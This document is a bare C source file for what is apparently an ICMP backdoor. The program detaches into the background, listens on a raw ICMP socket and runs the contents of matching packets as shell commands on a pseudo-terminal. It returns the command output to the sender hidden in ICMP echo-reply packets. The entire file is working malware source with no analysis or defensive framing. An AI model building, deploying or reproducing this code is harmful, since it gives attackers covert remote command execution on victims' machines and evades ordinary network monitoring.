#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <termios.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/socket.h>
#include <signal.h>
#include <grp.h>
#include <netinet/in.h>
/* #include <linux/net.h> */
#include <netdb.h>
#include <netinet/ip_icmp.h>

unsigned short cksum(void *ip,int len);
int pty_fork();
int ptys_open();
int ptym_open();
void errsys();

int fdm=0,elhijo;

void muerte(int nul) {
  fdm=0;
  wait(0);
  signal(SIGCHLD,muerte);
}
 
void main(int argc,char **argv){
	int sock,adlen,i;
	struct sockaddr_in addr;
	unsigned char buffer[1024];
	long optval=49152;
	struct hostent *byname;
	fd_set	fdset;
        int pty_name[80];
        int base,pid;
	struct {
		struct icmphdr icmp;
		char buf[56];
		} msg;


	signal(SIGCHLD,muerte);
	close(0);
	close(1);
	close(2);
	setsid();
	chdir("/");	

	if (!fork()) {
		signal(SIGCHLD,muerte);
		sock=socket(PF_INET,SOCK_RAW,IPPROTO_ICMP);
		while (1)	{
			FD_ZERO(&fdset);
			FD_SET(sock,&fdset);
                        if (fdm) 
                           FD_SET(fdm,&fdset);
			select(((sock>fdm)?sock:fdm)+1,&fdset,NULL,NULL,NULL);

			if(FD_ISSET(sock,&fdset))  {
			  adlen=sizeof(addr);
        		  optval=recvfrom(sock,(void *)buffer,sizeof(buffer),0,(struct sockaddr *)&addr,&adlen);
        		  base=(buffer[0]&0xf)*4;
       			  if ((buffer[base+4]||buffer[base+5] == 0) && !memcmp(buffer+base+4,"\0\0\0\0",4))
                            if (fdm)
          		       write(fdm,buffer+base+8,strlen(buffer+8+base));
                            else
                               if((elhijo=pty_fork(&fdm,pty_name,NULL,NULL))==0) {
                                  system(buffer+base+8); 
				  sleep(5);
				  close(fdm);
                                  exit(0);
                               }
      			}
			if (fdm && FD_ISSET(fdm,&fdset)) {
			  msg.buf[read(fdm,msg.buf,55)]=0;
			  msg.icmp.type=ICMP_ECHOREPLY;
			  msg.icmp.code=0;
			  msg.icmp.un.echo.id=1;
			  msg.icmp.un.echo.sequence=0;
			  msg.icmp.checksum=0;
			  msg.icmp.checksum=cksum(&msg,sizeof(msg));
			  sendto(sock,(void *)&msg,sizeof(msg),0,(struct sockaddr *)&addr,sizeof(addr));
			} 
		}
		close(sock);
	}
	sleep(1);
}

unsigned short cksum(void *ip,int len) {
	long	sum=0;

	while (len>1) {
		sum += *((unsigned short *)ip)++;
		if (sum & 0x80000000)
			sum = (sum & 0xFFFF) + (sum >> 16);
		len -= 2;
	}
	if (len)
		sum +=(unsigned short) *(unsigned char *) ip;
	while (sum >>16)
		sum = (sum&0xFFFF) + (sum >> 16);
	return ~sum;
}

void errsys(char * s)
{
 printf("%s\n",s);
 exit(1);
} 

int pty_fork (
  int *ptrfdm, char *slave_name,
  const struct termios *slave_termios,
  const struct winsize *slave_winsize)
{
  int fdm, fds;
  pid_t pid;
  char pts_name[20];
 
  if ( ( fdm = ptym_open (pts_name) ) < 0 )
    errsys("cant't open master pty");
  if (slave_name != NULL)
    strcpy(slave_name, pts_name);
  if ( (pid=fork()) < 0 )
    return(-1);
  else if (pid==0)
  {
    if ( setsid()<0 )
      errsys("setsid error");
    if ( (fds = ptys_open (fdm, pts_name) ) < 0 )
      errsys("can't open slave pty");
    close(fdm);
#if defined (TIOCSTTY) && !defined (CIBAUD)
    if ( ioctl(fds,TIOCSTTY, (char *) 0 ) < 0 )
      errsys("TIOCSTTY error");
#endif
    if (slave_termios != NULL )
    {
      if (tcsetattr(fds,TCSANOW, slave_termios) < 0)
        errsys("tcsetattr error on slave pty");
    }
    if (slave_winsize != NULL )
    {
      if ( ioctl(fds, TIOCSWINSZ, slave_winsize) < 0 )
        errsys("TIOCSWINSZ error on slave pty");
    }
    if (dup2(fds,STDIN_FILENO) != STDIN_FILENO)
      errsys("dup2 error on stdin");
    if (dup2(fds,STDOUT_FILENO) != STDOUT_FILENO)
      errsys("dup2 error on stdout");
    if (dup2(fds,STDERR_FILENO) != STDERR_FILENO)
      errsys("dup2 error on stderr");
    if (fds>STDERR_FILENO)
      close(fds);
    return(0);
  } else {
    setsid();
    *ptrfdm= fdm;
    return(pid);
  }
}
int ptym_open(char *pts_name)
{
  int fdm;
  char *ptr1, *ptr2;
 
  strcpy(pts_name, "/dev/ptyxy");
  for ( ptr1 = "pqrstuvwxyzPQRST"; *ptr1 != 0; ptr1++ )
  {
    pts_name[8]= *ptr1;
    for ( ptr2 = "0123456789abcdef" ; *ptr2 != 0; ptr2++ )
    {
      pts_name[9]= *ptr2;
      if ( (fdm=open(pts_name,O_RDWR)) < 0 )
      {
        if (errno == ENOENT)
          return(-1);
        else
          continue;
      }
      pts_name[5]='t';
      return(fdm);
    }
  }
  return(-1);
}
 
int ptys_open ( int fdm, char *pts_name)
{
  struct group *grptr;
  int gid, fds;
 
  if ( (grptr = getgrnam ("tty")) != NULL )
    gid= grptr->gr_gid;
  else
    gid= -1;
  chown(pts_name, getuid(),gid);
  chmod(pts_name, S_IRUSR | S_IWUSR | S_IWGRP);
  if ( (fds = open (pts_name, O_RDWR)) < 0 )
  {
    close (fdm);
    return(-1);
  }
  return (fds);
}
 
